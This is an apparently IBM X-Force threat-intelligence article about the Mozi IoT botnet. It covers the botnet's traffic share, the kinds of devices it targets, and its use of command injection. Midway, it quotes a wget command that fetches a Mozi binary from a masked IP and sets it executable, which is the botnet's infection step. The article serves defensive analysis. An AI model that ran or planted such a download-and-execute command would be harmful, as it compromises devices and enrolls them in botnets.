A New Botnet Attack Just Mozied Into Town

A relatively new player in the threat arena, the Mozi botnet, has spiked among Internet of things (IoT) devices, IBM X-Force has discovered.

This malware has been active since late 2019 and has code overlap with Mirai and its variants. Mozi accounted for nearly 90% of the observed IoT network traffic from October 2019 through June 2020.

This startling takeover was accompanied by a huge increase in overall IoT botnet activity, suggesting Mozi did not remove competitors from the market. Rather, it flooded the market, dwarfing other variants’ activity. Overall, combined IoT attack instances from October 2019, when attacks began to notably increase, through June 2020 is 400% higher than the combined IoT attack instances for the previous two years.

This surge in IoT attacks could be due to a number of causes, but may in part result from an ever-expanding IoT landscape for threat actors to target. There are about 31 billion IoT devices deployed around the globe, and the IoT deployment rate is now 127 devices per second.

Attackers have been leveraging these devices for some time now, most notably via the Mirai botnet. IBM X-Force Incident Response and Intelligence Services (IRIS) team has been following it for nearly four years. So why the sudden jump? IBM research suggests Mozi continues to be successful largely through the use of command injection (CMDi) attacks, which often result from the misconfiguration of IoT devices. The continued growth of IoT usage and poor configuration protocols are the likely culprits behind this jump. This increase may have been fueled further by corporate networks being accessed remotely more often due to COVID-19.

IoT Devices Are Everywhere

An IoT botnet can be used to perform distributed denial-of-service (DDoS) attacks, steal data and send spam. There are a plethora of different types of IoT devices to exploit:

  • Consumer IoT: Home-based devices, such as security cameras, lighting control, appliances, etc.
  • Commercial IoT: Devices designed for use in various industries. For instance, healthcare has internet-connected pacemakers and monitors. The transportation and construction industries use devices associated with vehicle trackers, telematics, logistic and supply chain systems and building information modeling.
  • Enterprise IoT: Devices designed for use in offices, such as projectors, routers, security systems and digital advertising.
  • The Industrial IoT: Industrial control systems, production line automation systems, logic controllers and aircraft systems.
  • Infrastructure IoT: Smart city management systems, traffic control devices, utility monitoring devices, etc.
  • Internet of Military Things: Wearable combat biometrics devices, robots and surveillance equipment.

This large attack surface leaves organizations vulnerable to IoT botnets. Couple that with the security holes these devices often have out of the box and lax hardening practices upon deployment. The most notable vulnerability in the IoT comes via CMDi attacks.

CMDi Attacks Deliver Mozi Botnet

Nearly all IBM-observed IoT targeting attempted to use CMDi attacks to gain initial access to the device. If the targeted endpoint was an IoT device and is susceptible to these attacks, the payload was downloaded and executed.

CMDi attacks are extremely popular against IoT devices for several reasons. First, IoT embedded systems commonly contain a web interface and a debugging interface left over from firmware development that can be exploited. Second, PHP modules built into IoT web interfaces can be exploited to give malicious actors remote execution capability. And third, IoT interfaces often are left vulnerable when deployed because administrators fail to harden the interfaces by sanitizing expected remote input. This allows threat actors to input shell commands such as “wget”.

Our analysis revealed the Mozi botnet leverages CMDi by using a “wget” shell command, then altering permissions to allow the threat actor to interact with the affected system. For example:

wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a

If the host was vulnerable to CMDi, this command would download and execute a file called “mozi.a.” Our analysis of this particular sample indicates the file executes on microprocessor without interlocked pipelined stages (MIPS) architecture. This is an extension understood by machines running reduced instruction set computer (RISC) architecture, which is prevalent on many IoT devices. Once the attacker gains full access to the device through the botnet, the firmware level can be changed and additional malware can be planted on the device.

Although this example cites a well-known vector, it can continue to be effective for two main reasons. First, new vulnerabilities allow for constant updating of exploitation attempts via CMDi, and slow patch implementation can be exploited. Secondly, this activity is easily automated, allowing threat actors to hit a broad swath of devices quickly at low cost.

The Mozi botnet infrastructure appears primarily sourced in China, accounting for 84% of observed infrastructure. This fact aligns with other open-source research into IoT activity in 2020.